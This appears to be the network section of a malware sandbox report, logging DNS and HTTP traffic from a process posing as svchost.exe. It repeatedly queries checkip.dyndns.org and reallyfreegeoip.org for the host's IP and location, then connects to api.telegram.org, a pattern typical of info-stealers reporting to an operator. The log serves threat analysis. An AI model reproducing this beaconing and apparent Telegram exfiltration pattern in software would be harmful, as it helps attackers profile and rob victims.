                                                                                                              Jan 10, 2025 22:13:46.957472086 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.961487055 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:53.529243946 CET4970980192.168.2.8193.122.130.0
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 22:13:35.576817989 CET5239453192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET53523941.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:36.564611912 CET6263353192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET53626331.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.074071884 CET5690453192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 22:13:46.081897974 CET53569041.1.1.1192.168.2.8
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 22:13:35.576817989 CET192.168.2.81.1.1.10x9bc0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.564611912 CET192.168.2.81.1.1.10xcb89Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:46.074071884 CET192.168.2.81.1.1.10xf5d7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET1.1.1.1192.168.2.80x9bc0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET1.1.1.1192.168.2.80x9bc0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET1.1.1.1192.168.2.80x9bc0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET1.1.1.1192.168.2.80x9bc0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET1.1.1.1192.168.2.80x9bc0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:35.584291935 CET1.1.1.1192.168.2.80x9bc0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:36.571784019 CET1.1.1.1192.168.2.80xcb89No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 22:13:46.081897974 CET1.1.1.1192.168.2.80xf5d7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849704193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:35.599004030 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 22:13:36.079662085 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:36 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 578bab6d43261325c76da0e3e1a3f670
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 22:13:36.091152906 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 22:13:36.197774887 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:36 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 13550d67d812ec20292f58fb1d95beab
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 22:13:37.573887110 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 22:13:37.683274984 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:37 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: cca225d6d67b146950eec5b768ff5eea
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849707193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:38.308370113 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 22:13:38.799928904 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 2befe7ed2b3f2e60e18822b56fa6374a
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849709193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:39.429843903 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 22:13:39.911894083 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:39 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: db9879f29e5d524207902668f7d2908a
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849711193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:40.539737940 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 22:13:41.009404898 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:40 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: d91062c7f55c498e0ae1791c6ba4333b
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849713193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:41.654685020 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 22:13:42.112885952 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:42 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 691ae9fcc60842814b6fa99a243ea089
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849715193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:42.748915911 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 22:13:43.228657007 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:43 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 52df4c8d5446dca57cb9729e945c82dd
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849717193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:43.851037025 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 22:13:44.326091051 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:44 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 151268c9bb8de59c5172470a876d4333
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849720193.122.130.0806012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 22:13:44.968206882 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 22:13:45.424164057 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:45 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: c2155e3bb46179f8a2e0dbe9d1feda52
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849705104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:37 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:37 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858406
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AmAAaRBlBXM47%2FsoAZcklD891OLfng6tYWuchJvCn1G%2FboGmeGHjpeL6zVY9S7pTSTKRRQYHmXSskwqRl9T%2FslubfrfvbWVsT7qEoEi2VURCQC%2BUcJ43HiuzHwsHC3uE8MRiBYUN"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac08f8758c0f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2035&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1420233&cwnd=223&unsent_bytes=0&cid=9186f0f9f3ec6dd4&ts=344&x=0"
                                                                                                              2025-01-10 21:13:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849706104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:38 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 21:13:38 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858407
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tRzGsE6iXKw1VKEQ8pZecYmkXE3%2FUVIeJFhElylvWqJ%2FAEPi%2FV0DP5sTm3%2FHBot3x0CXp6Qkl2bFWERKGbwSuxo3N4ipCgc8d04D6GOYxmgxJcuegNlUxD6Ea6h5EbJl9pfvRFvh"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac0dea210f36-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1495&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1953177&cwnd=231&unsent_bytes=0&cid=360a18799ec0e64b&ts=153&x=0"
                                                                                                              2025-01-10 21:13:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849708104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:39 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:39 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858408
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g1VA0C5QqwFs%2FHkOwRM5nI31BGJ%2BiAP%2BXpk%2FAiLyIQm0pNXPkFEYVu%2F0lOXsSeteycsUjElNaIjHmRo4hB2yz5Z42n7i%2FS7uVXStEC8ruGr34qiAt67046NFaiUokoqBrrzibQGX"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac14fc09c443-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1637&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1733966&cwnd=244&unsent_bytes=0&cid=27c2a70bc22f426d&ts=165&x=0"
                                                                                                              2025-01-10 21:13:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849710104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:40 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858409
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
